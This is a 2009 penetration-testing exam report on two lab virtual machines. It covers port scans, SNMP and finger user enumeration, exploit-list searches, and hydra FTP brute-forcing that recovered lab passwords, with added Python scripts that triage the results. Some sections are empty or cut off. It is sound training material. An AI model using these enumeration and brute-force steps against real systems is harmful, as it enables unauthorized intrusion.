Certified Penetration Tester (CPT) Practical Examination Report
Matthew Tiedeman
mtiedeman@gmail.com
February 21st, 2009
Contents
1. Overview
2. Assumptions
3. Tools
4. Penetration test details
   A. Scanning
      i. Baseline scan of network
      ii. Port scanning and OS fingerprinting
      iii. Service fingerprinting - TCP services
      iv. Service fingerprinting - Validation of Apache HTTP service
      v. SNMP enumeration
      vi. Service fingerprinting - UDP services
   B. Sites used during the exploit research phase
   C. Remote exploits
      i. Research via anyside.org
      ii. Exploits round 1
      iii. Research via secwatch.org
      iv. Exploits round 2
   D. User discovery
      i. Abuse of finger
   E. Brute force password guessing
      i. Discovery of password for user account
      ii. Discovery of password for cptvm1 and cptvm2 accounts
   F. Research of cptvm1 and cptvm2 hosts
      i. cptvm1
      ii. cptvm2
   G. Penetration of cptvm1
      i. Local exploit research via anyside.org
      ii. Local exploit research via secwatch.org
      iii. Privilege escalation using a Kernel VMA exploit
      iv. Maintaining access via creation of a new r00t account
      v. Gathering the shadow password file
   H. Cracking passwords of the cptvm1 host
      i. Cracking of user, cptvm1 and cptvm2
   I. Penetration of cptvm2
      i. Privilege escalation using a Kernel vmsplice exploit
      ii. Maintaining access via creation of a new r00t account
      iii. Gathering the shadow password file
   J. Cracking passwords of the cptvm2 host
      i. Cracking of cptvm1, cptvm2, root and r00t
   K. Cracking passwords of the cptvm1 host round 2
      i. Cracking of root and r00t
   L. Ultimate goal
      i. cptvm1 and cptvm2 hosts compromised
      ii. Passwords for root accounts on cptvm1 and cptvm2
   M. Lessons learned
      i. Searching exploit sites
      ii. Attack vectors
5. Appendix
   A. Source code for the Kernel 2.4 VMA exploit
   B. Source code for the Kernel 2.6 vmsplice exploit
1. Overview
2. Assumptions
3. Tools
The following tools were used during the completion of the penetration testing
practical examination.
- back|track3: Collection of penetration tester utilities.
- VMware Fusion: VMware virtual host software for OSX.
- Apple OSX: Host operating system used to execute VMware Fusion.
- nmap: Port scanning, fingerprinting, swiss army knife utility.
- httprint: HTTP fingerprinting utility.
- snmpenum.pl: SNMP enumeration utility.
- vi: Text editor.
- emacs: A swiss army knife editor (text/source code/etc).
- gcc: C, etc compiler.
- tftp: Trivial File Transfer Protocol client.
- ssh: Secure shell client.
Based upon the list of open ports, it can be concluded that cptvm1,
192.168.1.200, is most likely a server, while cptvm2, 192.168.1.104,
is most likely a client workstation.
bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT      STATE SERVICE
7/tcp     open  echo
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
79/tcp    open  finger
80/tcp    open  http
109/tcp   open  pop2
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
199/tcp   open  smux
443/tcp   open  https
686/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
6000/tcp  open  X11
32768/tcp open  unknown
32770/tcp open  sometimes-rpc3
MAC Address: 00:0C:29:27:60:0A (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)
Network Distance: 1 hop
Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT
STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
939/tcp open unknown
MAC Address: 00:0C:29:3B:43:BC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds
bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMT
Warning: Giving up on port early because retransmission cap hit.
Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)
Service versions identified on cptvm1 (192.168.1.200):
PORT      SERVICE   VERSION
21/tcp    ftp       vsftpd 1.1.3
22/tcp    ssh       OpenSSH 3.5p1 (protocol 1.99)
23/tcp    telnet    Linux telnetd
79/tcp    finger    Linux fingerd
80/tcp    http      Apache httpd 2.0.40 (Red Hat Linux)
110/tcp   pop3      ipopd 2001.78rh
111/tcp   rpcbind   2 (rpc #100000)
143/tcp   imap      UW Imapd 2001.315rh
199/tcp   smux      Linux SNMP multiplexer
443/tcp   ssl/http  Apache httpd 2.0.40 (Red Hat Linux)
686/tcp   rquotad   1-2 (rpc #100011)
32768/tcp status    1 (rpc #100024)
32770/tcp mountd    1-3 (rpc #100005)
v. SNMP enumeration
The snmp service was identified as listening on port 199/tcp of the
cptvm1 host, 192.168.1.200. In addition, the cptvm1 host OS was
identified as Linux. With these two factors in mind, the snmpenum.pl
utility can be utilized to gather system information. Of particular
interest are the UDP services currently running on the hosts.
Along with UDP ports 7, 13, 37, 111, 123, 161, 162, 631 and 683,
various process and service information was discovered.
bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt
---------------------------------------
UPTIME
---------------------------------------
1 hour, 40:22.46
---------------------------------------
HOSTNAME
---------------------------------------
cptvm1
---------------------------------------
RUNNING SOFTWARE PATHS
---------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
---------------------------------------
RUNNING PROCESSES
---------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
---------------------------------------
MOUNTPOINTS
---------------------------------------
/
/proc/bus/usb
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers
---------------------------------------
SYSTEM INFO
---------------------------------------
Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686
---------------------------------------
LISTENING UDP PORTS
---------------------------------------
7
13
37
111
123
161
162
631
683
---------------------------------------
LISTENING TCP PORTS
---------------------------------------
7
21
22
23
79
80
109
110
111
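The port lists a host reports about itself over SNMP are worth cross-checking against the external scan: ports only SNMP lists are bound to localhost or filtered before they reach the scanner, and ports only the scan saw mean the SNMP view is incomplete. The following parser and check are an added example, not part of the report; the snmpenum.pl text is a constructed excerpt in the tool's layout with TCP 25 and 5432 added as localhost-only listeners to show a mismatch, and the nmap sets are the ones the report lists for cptvm1.

```python
"""Cross-check what a host reports about itself over SNMP against what an
external scan saw.  Added example, not part of the original report."""
import re

# Constructed excerpt in snmpenum.pl's layout (dashed line, section name,
# dashed line, one value per line).  Port values are the ones the report
# shows for cptvm1, plus TCP 25 and 5432 added here as localhost-only
# listeners that an external scan would never see.
SNMPENUM_OUTPUT = """\
---------------------------------------
HOSTNAME
---------------------------------------
cptvm1
---------------------------------------
LISTENING UDP PORTS
---------------------------------------
7
13
37
111
123
161
162
631
683
---------------------------------------
LISTENING TCP PORTS
---------------------------------------
7
21
22
23
25
79
80
109
110
111
143
199
443
686
993
995
5432
6000
32768
32770
"""

# Open ports the report's nmap scans found on cptvm1 from the outside.
NMAP_TCP = {7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686,
            993, 995, 6000, 32768, 32770}
NMAP_UDP = {7, 13, 37, 111, 123, 161, 162, 631, 683}

SEPARATOR = re.compile(r"^-{20,}$")

def parse_snmpenum(text):
    """Return {section name: [value lines]} from snmpenum.pl output."""
    sections, current = {}, None
    lines = [line.rstrip() for line in text.splitlines()]
    i = 0
    while i < len(lines):
        # A section starts with a dashed line, its name, and a second dashed line.
        if (SEPARATOR.match(lines[i]) and i + 2 < len(lines)
                and SEPARATOR.match(lines[i + 2])):
            current = lines[i + 1].strip()
            sections[current] = []
            i += 3
            continue
        if current is not None and lines[i]:
            sections[current].append(lines[i])
        i += 1
    return sections

def listening_ports(sections, proto):
    key = "LISTENING %s PORTS" % proto.upper()
    return {int(v) for v in sections.get(key, []) if v.isdigit()}

def reconcile(sections, proto, scanned):
    """Return (only_via_snmp, only_via_scan), both sorted lists.
    Ports only SNMP reports are bound to localhost or filtered in transit;
    ports only the scan saw mean the SNMP view is incomplete."""
    reported = listening_ports(sections, proto)
    return sorted(reported - scanned), sorted(scanned - reported)

def demo():
    """Reconcile the constructed cptvm1 data: {proto: (snmp_only, scan_only)}."""
    sections = parse_snmpenum(SNMPENUM_OUTPUT)
    return {"tcp": reconcile(sections, "tcp", NMAP_TCP),
            "udp": reconcile(sections, "udp", NMAP_UDP)}

if __name__ == "__main__":
    for proto, (snmp_only, scan_only) in demo().items():
        print(proto, "only via SNMP:", snmp_only, "only via scan:", scan_only)
```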
From the information gathered during this step, the systems of interest are
configured as follows:

cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)

cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh
  111/tcp    rpcbind
  939/tcp    status
C. Remote exploits
i. Research via anyside.org
A list of exploits was downloaded from the anyside.org web site. The
list consisted of a small description of the exploit and a link to the
source code for the exploit. A list of search items was then created
based upon the findings from the scanning phase.
$ cat ../commands/remote-search.txt
apache
finger
imap
ipop
ntp
open ssh
openssh
rpc
rpcbind
rpcmount
rpcstatus
rquota
snmp
snmptrap
telnet
vs ftp
vsftp
x11
The search items list and the exploit list were used to gain a list of
possible remote exploits for the cptvm1 host.
$ grep exploits\/remote exploits_list.txt | grep -w -i -f ../commands/remotesearch.txt | sort -u > possible_remote_200.txt
$ ll
total 1664
drwxr-xr-x  6 matt matt    204 Feb 21 14:46 ./
drwxr-xr-x 16 matt matt    544 Feb 21 14:46 ../
-rw-r--r--  1 matt matt 126720 Feb  6 14:40 exploits_list.db.tgz
-rw-r--r--  1 matt matt 702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--  1 matt matt   9376 Feb  6 14:43 possible_remote_200.txt
$ cat possible_remote_200.txt
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS. Related advisory
....;http://www.anyside.org/exp/exploits/remote/101_ncat.c;MailEnable , IMAP Service, Remote Buffer Overflow Exploit v0.4
2005-06-07;http://www.anyside.org/exp/exploits/remote/2005060701.txt;IPSwitch IMAP Server LOGON Remote Stack Overflow
2005-09-20;http://www.anyside.org/exp/exploits/remote/2005092001.txt;Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
2006-03-10;http://www.anyside.org/exp/exploits/remote/2006031002.txt;Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031901.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031903.txt;Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit
2006-06-05;http://www.anyside.org/exp/exploits/remote/2006060506.txt;Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit
2006-07-23;http://www.anyside.org/exp/exploits/remote/2006072301.txt;Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-11;http://www.anyside.org/exp/exploits/remote/2006091101.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2007-01-15;http://www.anyside.org/exp/exploits/remote/2007011502.txt;Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit
2007-02-01;http://www.anyside.org/exp/exploits/remote/2007020107.txt;CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit
2007-02-23;http://www.anyside.org/exp/exploits/remote/2007022306.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
2007-03-01;http://www.anyside.org/exp/exploits/remote/2007030102.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
2007-03-10;http://www.anyside.org/exp/exploits/remote/2007031002.txt;MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)
2007-03-24;http://www.anyside.org/exp/exploits/remote/2007032401.txt;Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
2007-03-30;http://www.anyside.org/exp/exploits/remote/2007033002.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2007-04-15;http://www.anyside.org/exp/exploits/remote/2007041501.txt;MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445)
2007-05-26;http://www.anyside.org/exp/exploits/remote/2007052601.txt;Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
2007-05-30;http://www.anyside.org/exp/exploits/remote/2007053001.txt;Eudora 7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day
2007-06-22;http://www.anyside.org/exp/exploits/remote/2007062201.txt;Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
2007-07-08;http://www.anyside.org/exp/exploits/remote/2007070801.txt;Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
2007-09-03;http://www.anyside.org/exp/exploits/remote/2007090301.txt;CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-10-14;http://www.anyside.org/exp/exploits/remote/2007101401.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit
2007-10-21;http://www.anyside.org/exp/exploits/remote/2007102101.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
2007-12-18;http://www.anyside.org/exp/exploits/remote/2007121805.txt;MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)
2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
2008-04-06;http://www.anyside.org/exp/exploits/remote/2008040601.txt;Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
2008-06-30;http://www.anyside.org/exp/exploits/remote/2008063003.txt;Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS
2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071701.txt;Debian
While this list looks impressive in length, removing exploits that don't
match the operating system, don't match the software installed, don't
match the proper version or don't provide a privilege escalation leaves
only 3 exploits:
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.
20050430;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit
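The keyword grep above and the manual narrowing that follows (platform, installed software, affected version, impact) can be run as one pass over the list, which is what a vulnerability-management check against fingerprinted service versions does. The following is an added example, not the report's own tooling: the list lines are a constructed sample in the report's date;url;description layout, the service versions are the ones fingerprinted on cptvm1, and the platform and impact word lists are assumptions of this example. Whatever survives still needs a human read, since a keyword match does not prove the product is installed.

```python
"""Triage an exploit/advisory list against fingerprinted services.
Added example, not the report's own tooling."""
import re

# Constructed sample: six entries copied from the report's listing, in its
# 'date;url;description' layout.
EXPLOIT_LIST = """\
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS. Related advisory
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
"""

# Search term (prefix match, as in the report's remote-search.txt) -> version
# fingerprinted on cptvm1; None means no version is known for that service.
SERVICES = {
    "apache": "2.0.40",
    "openssh": "3.5p1",
    "imap": "2001.315rh",
    "vsftp": "1.1.3",
    "rpc": None,
    "snmp": None,
    "telnet": None,
}

# Assumed word lists (not from the report): other platforms and DoS-only impact.
OTHER_PLATFORM = re.compile(r"\b(windows|win32|win2k\w*|win2003|solaris)\b", re.I)
DOS_ONLY = re.compile(r"\b(denial of service|dos)\b", re.I)
# '< 1.3.37, 2.0.59, 2.2.3' or '<= 4.3': operator plus one bound per branch.
VERSION_BOUND = re.compile(r"(<=|<)\s*(\d[\w.]*(?:\s*,\s*\d[\w.]*)*)")

def version_key(text):
    """'3.5p1' -> (3, 5, 1): compare the numeric runs only."""
    return tuple(int(n) for n in re.findall(r"\d+", text))

def parse_entry(line):
    date, url, desc = line.split(";", 2)
    return date, url, desc.strip()

def matching_terms(desc):
    return [t for t in SERVICES if re.search(r"\b" + re.escape(t), desc, re.I)]

def version_affected(desc, installed):
    """True when the description states no upper bound, or the installed
    version falls under one of the stated '<' / '<=' bounds."""
    if installed is None:
        return True
    m = VERSION_BOUND.search(desc)
    if not m:
        return True
    op, bounds = m.group(1), [b.strip() for b in m.group(2).split(",")]
    have = version_key(installed)
    for b in bounds:
        limit = version_key(b)
        # With one bound per release branch, only compare against our branch.
        if len(bounds) > 1 and limit[:2] != have[:2]:
            continue
        if have < limit or (op == "<=" and have == limit):
            return True
    return False

def classify(desc):
    terms = matching_terms(desc)
    if not terms:
        return "no-service-match"
    if OTHER_PLATFORM.search(desc):
        return "excluded-platform"
    if not any(version_affected(desc, SERVICES[t]) for t in terms):
        return "excluded-version"
    if DOS_ONLY.search(desc):
        return "dos-only"
    return "candidate"

def triage(list_text=EXPLOIT_LIST):
    """Return [(url basename, status)] for every entry in the list."""
    out = []
    for line in list_text.splitlines():
        if line.strip():
            _, url, desc = parse_entry(line)
            out.append((url.rsplit("/", 1)[-1], classify(desc)))
    return out

if __name__ == "__main__":
    for name, status in triage():
        print("%-18s %s" % (status, name))
```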
ii. Exploits round 1
The 3 exploits found were downloaded and reviewed. The following
lists the exploits in the order they were attempted (from most to least
likely to work).
Reviewing the code for this exploit reveals that the exploit was
written in 1998. The possibility of this exploit being successful was
deemed to be very slim. The exploit was successfully compiled
after making minor modifications to the source to fix syntax issues
due to line wrapping/formatting defects. The execution of the
exploit was unsuccessful.
iii. Research via secwatch.org
Having exhausted the exploits known to the anyside.org site, the
secwatch.org site was used to continue the search. The search results
were quite extensive compared to the anyside.org list. However, the
only additional exploit located was one for the UW imapd IMAP 4.1 server.
iv. Exploits round 2
After quite an extensive review of possible exploits, only one additional
exploit was located: the UW imapd IMAP 4.1 server exploit.
D. User discovery
i. Abuse of finger
The finger service running on port 79/tcp provides us with the ability
to brute force user names on the cptvm1 host. To accomplish this, a
shell script executing finger over a list of user names was
implemented. The list of user names was generated by googling for a
list of common user names. The VM running back|track3 did not have
a proper finger client installed, so this command was executed from the
host machine under OSX.
The names of 18 users on the cptvm1 host were discovered.
Reviewing the output from the finger command reveals that of the 18
user accounts, only the root, user and postgres users have the
ability to log in to a standard shell.
$ cat fingerListOfUserNames.sh
#!/bin/bash
# Usage: fingerListOfUserNames.sh <host> <file with one user name per line>
# Queries the finger service on <host> once per name and appends every raw
# response to usersOn<host>_RAW.txt for later review.
host="$1"
list="$2"
[ -n "$host" ] && [ -r "$list" ] || { echo "usage: $0 host userlist" >&2; exit 1; }
while read -r userName; do
    finger "${userName}@${host}" >> "usersOn${host}_RAW.txt"
done < "$list"
 7 matt matt   238 Feb 11 22:23 ./
11 matt matt   374 Feb 10 19:12 ../
 1 matt matt   291 Feb 11 22:06 fingerListOfUserNames.sh*
 1 matt matt  3550 Feb 10 19:31 usernames.txt
 1 matt matt   107 Feb 11 22:06 usersOn192.168.1.200.txt
 1 matt matt  4699 Feb 11 21:46 usersOn192.168.1.200_FOUND.txt
 1 matt matt 26235 Feb 11 21:46 usersOn192.168.1.200_RAW.txt
$ cat usersOn192.168.1.200.txt
adm
apache
daemon
ftp
lp
mail
nfsnobody
nobody
nscd
operator
postgres
root
rpc
rpcuser
sshd
user
uucp
vcsa
From the information gathered during this step, the systems of interest are
configured as follows:

cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd,
operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa

cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh
  111/tcp    rpcbind
  939/tcp    status
session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume
session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h
[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h
[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h
[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h
[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h
[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h
[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h
[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h
[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h
[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h
[21][ftp] host: 192.168.1.200
login: cptvm1
password: windows
[STATUS] attack finished for 192.168.1.200 (valid pair found)
Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25
bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56
[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h
[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h
[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h
[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h
[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h
[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h
[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h
[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h
[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h
[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h
[21][ftp] host: 192.168.1.200
login: cptvm2
password: linux
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01
From the information gathered during this step, the systems of interest are
configured as follows:

cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Username/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)
